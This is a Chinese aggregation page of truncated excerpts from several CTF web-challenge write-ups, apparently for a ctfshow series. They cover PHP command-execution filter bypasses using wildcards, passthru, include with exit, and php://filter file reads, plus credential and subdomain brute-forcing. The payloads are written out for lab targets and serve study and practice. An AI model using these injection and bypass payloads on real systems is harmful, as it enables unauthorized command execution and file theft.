命令執行小技巧 可以先看下這篇文章,方便接下來的做題 web 29 解法一: 由於過濾了flag,可以使用通配符進行繞過 在linux系統中 有一些通配符 匹配任何字符串/文本,包括空字符串;*代表任意字符(0個或多個) ls file * ? 匹配任何一個字符(不在括號 ...
這幾天都沒有怎么學習,基本上都是復習學科知識,因為我們要期末考試。剛剛好今天有時間來做了一道命令執行的題,再一次拜讀了 p神的文章。受益匪淺。 直接進入正題 源代碼 錯誤思想 你們是在炫技 哎,看的代碼的時候就只能使用一些特殊符號。 先說說自己錯誤的方法吧,自己是使用 運算符進行拼接命令然后執行。然后發現其他它改變就不會執行也不是eval 函數,然后就失敗了。 最后大佬提醒了一下:說沒有過濾 . ...
2020-09-10 15:35 0 583 推薦指數:
命令執行小技巧 可以先看下這篇文章,方便接下來的做題 web 29 解法一: 由於過濾了flag,可以使用通配符進行繞過 在linux系統中 有一些通配符 匹配任何字符串/文本,包括空字符串;*代表任意字符(0個或多個) ls file * ? 匹配任何一個字符(不在括號 ...
命令執行 剛剛開始學習命令執行,萌新一個 因為是學習嘛,所以東西寫的雜亂了 web 29 解法一:利用通配符$ payload:?c=system('cat fla*'); 只是剛剛輸入完這個之后,由於是空白頁面,以為錯誤了 解法一,變式:修改文件名 解法二:利用 ...
web29: 利用函數:eval() 繞過思路:通配符繞過flag過濾 Payload1:/?c=system(“ls”); #找到flag.php Payload2:/?c=system(“cat fla*”); web30 利用函數:eval() 繞過思路:過濾 ...
web29 過濾了flag ?c=system("cat f*"); web30 過濾了system|flag,用一個代替system()的函數 ?c=passthru("cat f*"); web31 過濾了system|cat|flag|空格 ?c=passthru("more ...
web71 payload:c=include("/flag.txt");exit(); 執行完前面的包含語句后會強制退出,不會執行后面的語句 web72 這道題是真的沒怎么看懂,看了網上的wp 先查詢到flag文件的位置,找到 flag0.txt 文件 ...
web40 別看這里過濾了這么多,其實他過濾的括號是中文括號,這里我開始納悶了好久 先說一個打印當初路徑下文件的函數:print_r(scandir('.')) 但是很明顯單引號和小數點已經過濾了,這里要先辦法繞過 最簡單的方法是利用函數傳參,那就找當前能用包含小數點的函數 ...
web21 先隨便輸入賬號密碼,抓包 base64解密,可以發現賬號密碼的形式為 賬號:密碼,這里我們采用 Custom iterator進行爆破 使用方法可參考:Custom iterator的使用 爆破即可得到flag web22 子域名爆破 ...
web 78 payload:?file=php://filter/read=convert.base64-encode/resource=flag.php web 79 payload: ?file=data://text/plain;base64 ...